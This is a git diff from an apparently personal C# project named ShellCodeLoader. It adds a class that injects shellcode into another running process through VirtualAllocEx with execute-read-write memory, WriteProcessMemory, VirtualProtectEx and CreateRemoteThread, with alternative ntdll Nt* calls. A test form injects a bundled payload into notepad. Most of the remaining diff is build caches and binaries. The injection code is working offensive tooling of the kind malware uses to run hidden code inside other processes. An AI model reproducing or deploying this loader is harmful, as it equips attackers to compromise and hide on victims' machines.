+ this.ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.PageProtection flOld;
+ Imports.VirtualProtectEx(Target.Handle, ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+ IntPtr hThread = Imports.CreateRemoteThread(Target.Handle, IntPtr.Zero, 0, ptr, IntPtr.Zero, Imports.ThreadCreationFlags.NORMAL, out hThread);
+ }
+
+ private static class Imports
+ {
+
+ internal const String KERNEL32 = "kernel32.dll";
+ internal const String NTDLL = "ntdll.dll";
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
+
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern uint NtCreateThreadEx(ref IntPtr threadHandle, AccessMask desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool inCreateSuspended, Int32 stackZeroBits, Int32 sizeOfStack, Int32 maximumStackSize, IntPtr attributeList);
+
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualAllocEx(IntPtr procHandle,IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtectEx(IntPtr procHandle, IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, ThreadCreationFlags dwCreationFlags, out IntPtr lpThreadId);
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentProcess();
+
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
+ public enum ThreadCreationFlags : uint
+ {
+ NORMAL = 0x0,
+ CREATE_SUSPENDED = 0x00000004,
+ STACK_SIZE_PARAM_IS_A_RESERVATION = 0x00010000
+ }
+
+ public enum AccessMask : uint
+ {
+ GENERIC_READ = 0x80000000,
+ GENERIC_WRITE = 0x40000000,
+ GENERIC_EXECUTE = 0x20000000,
+ GENERIC_ALL = 0x10000000
+ }
+
+ public enum PageProtection : uint
+ {
+ PAGE_EXECUTE = 0x10,
+ PAGE_EXECUTE_READ = 0x20,
+ PAGE_EXECUTE_READWRITE = 0x40,
+ PAGE_EXECUTE_WRITECOPY = 0x80,
+ PAGE_NOACCESS = 0x01,
+ PAGE_READONLY = 0x02,
+ PAGE_READWRITE = 0x04,
+ PAGE_WRITECOPY = 0x08,
+ PAGE_TARGETS_INVALID = 0x40000000,
+ PAGE_TARGETS_NO_UPDATE = 0x40000000,
+ PAGE_GUARD = 0x100,
+ PAGE_NOCACHE = 0x200,
+ PAGE_WRITECOMBINE = 0x400
+ }
+ public enum TypeAlloc : uint
+ {
+ MEM_COMMIT = 0x00001000,
+ MEM_RESERVE = 0x00002000,
+ MEM_RESET = 0x00080000,
+ MEM_RESET_UNDO = 0x1000000,
+ MEM_LARGE_PAGES = 0x20000000,
+ MEM_PHYSICAL = 0x00400000,
+ MEM_TOP_DOWN = 0x00100000,
+ MEM_WRITE_WATCH = 0x00200000
+ }
+ public enum FreeType : uint
+ {
+ MEM_DECOMMIT = 0x00004000,
+ MEM_RELEASE = 0x00008000,
+ MEM_COALESCE_PLACEHOLDERS = 0x00000001,
+ MEM_PRESERVE_PLACEHOLDER = 0x00000002
+ }
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
diff --git a/ShellCodeLoader/bin/Release/ShellCodeLoader.dll b/ShellCodeLoader/bin/Release/ShellCodeLoader.dll
new file mode 100644
index 0000000..770b70d
Binary files /dev/null and b/ShellCodeLoader/bin/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb b/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb
new file mode 100644
index 0000000..f11539b
Binary files /dev/null and b/ShellCodeLoader/bin/Release/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index a8a6e50..7494a0d 100644
Binary files a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache
index e83d642..a4f84b8 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index a606657..d5c5dc4 100644
Binary files a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index a08e837..3a3c169 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-1c02f89cdd426da38f937db1d7ded7d8cbdc2708
+562235441aa9945ecc80c9dfdabd94dedabee3b8
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
index d8444df..363f2ce 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
@@ -3,4 +3,3 @@ F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\Release\ShellCodeLoader.pdb
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.dll
F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.pdb
-F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\Release\ShellCodeLoader.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index c12f470..770b70d 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb
index 345f2ae..f11539b 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
new file mode 100644
index 0000000..5d01041
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.0.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs
new file mode 100644
index 0000000..e5dc9b8
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/.NETFramework,Version=v4.5.AssemblyAttributes.cs
@@ -0,0 +1,4 @@
+//
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
diff --git a/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
new file mode 100644
index 0000000..1d70313
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..0aa6130
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..12784e8
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+1ba3ce01bd1fed7e622dc2a6a7acac9a7b78349d
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..8a6a532
--- /dev/null
+++ b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.csproj.FileListAbsolute.txt
@@ -0,0 +1,6 @@
+F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\ShellCodeLoader\bin\x64\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\ShellCodeLoader\obj\x64\Release\ShellCodeLoader.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll
new file mode 100644
index 0000000..614d1e7
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb
new file mode 100644
index 0000000..9c2dd1e
Binary files /dev/null and b/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb differ
diff --git a/Test/Form1.cs b/Test/Form1.cs
index 0928139..98766a9 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -1,4 +1,5 @@
using System;
+using System.Diagnostics;
using System.Windows.Forms;
/*
|| AUTHOR Arsium ||
@@ -19,25 +20,56 @@ public Form1()
private void button1_Click(object sender, EventArgs e)
{
- if (IntPtr.Size == 8)
- {
- ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
- cpp.LoadWithNT();
- cpp.Dispose();
- ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
- csharp.LoadWithNT();
- csharp.Dispose();
- }
- else
- {
- ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
- cpp.Asynchronous = true;
- cpp.LoadWithNT();
- cpp.Dispose();
- ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
- csharp.LoadWithNT();
- csharp.Dispose();
- }
+ /* if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }*/
+
+
+
+
+ Process Target = Process.GetProcessesByName("notepad")[0];
+ MessageBox.Show(Target.MainWindowTitle);
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
+ cpp.LoadWithKernel32();
+ cpp.LoadWithNT();
+ cpp.Dispose();
+
+ /* if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoaderEx csharp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCSharp64.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNT();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoaderEx csharp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCSharp32.rawData);
+ csharp.LoadWithNT();
+ csharp.Dispose();
+ }*/
+
}
private void button2_Click(object sender, EventArgs e)
{
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 391aa0c..c7f583d 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/Debug/Test.csproj.AssemblyReference.cache
index 9e11a68..68e392b 100644
Binary files a/Test/obj/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Debug/build.force b/Test/obj/Debug/build.force
new file mode 100644
index 0000000..e69de29
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache
new file mode 100644
index 0000000..29e521b
Binary files /dev/null and b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Release/Test.csproj.AssemblyReference.cache b/Test/obj/Release/Test.csproj.AssemblyReference.cache
index f5e894a..6522bf5 100644
Binary files a/Test/obj/Release/Test.csproj.AssemblyReference.cache and b/Test/obj/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
index fc99eaf..053591b 100644
--- a/Test/obj/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -8,6 +8,6 @@ F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Form1.resources
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Properties.Resources.resources
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.GenerateResource.cache
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
-F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.exe
F:\Personal\ShellCodeLoader\Test\obj\Release\Test.pdb
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index ef7cd64..b7f6513 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 1ebdc16..2dbd421 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache
index 775dd3a..5314c1a 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
index 855dbe7..9b23b08 100644
--- a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
+++ b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-69ed1963c678b7433cfcad1463c463db4cb3db12
+e611841c91334bbfdd54b06c6f65ffef0d5bc2a6
diff --git a/Test/obj/x64/Debug/Test.exe b/Test/obj/x64/Debug/Test.exe
index 4347f89..5c22eda 100644
Binary files a/Test/obj/x64/Debug/Test.exe and b/Test/obj/x64/Debug/Test.exe differ
diff --git a/Test/obj/x64/Debug/Test.pdb b/Test/obj/x64/Debug/Test.pdb
index 4fd0d42..527d146 100644
Binary files a/Test/obj/x64/Debug/Test.pdb and b/Test/obj/x64/Debug/Test.pdb differ
diff --git a/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
index d6aed18..854e59d 100644
--- a/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/x64/Release/Test.csproj.FileListAbsolute.txt
@@ -8,6 +8,5 @@ F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Form1.resources
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.Properties.Resources.resources
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.GenerateResource.cache
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CoreCompileInputs.cache
-F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.csproj.CopyComplete
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.exe
F:\Personal\ShellCodeLoader\Test\obj\x64\Release\Test.pdb
diff --git a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache
index ee0944a..976c1bd 100644
Binary files a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Release/Test.exe b/Test/obj/x64/Release/Test.exe
index 0629c45..a7f8284 100644
Binary files a/Test/obj/x64/Release/Test.exe and b/Test/obj/x64/Release/Test.exe differ
diff --git a/Test/obj/x64/Release/Test.pdb b/Test/obj/x64/Release/Test.pdb
index c2613dc..66ffc94 100644
Binary files a/Test/obj/x64/Release/Test.pdb and b/Test/obj/x64/Release/Test.pdb differ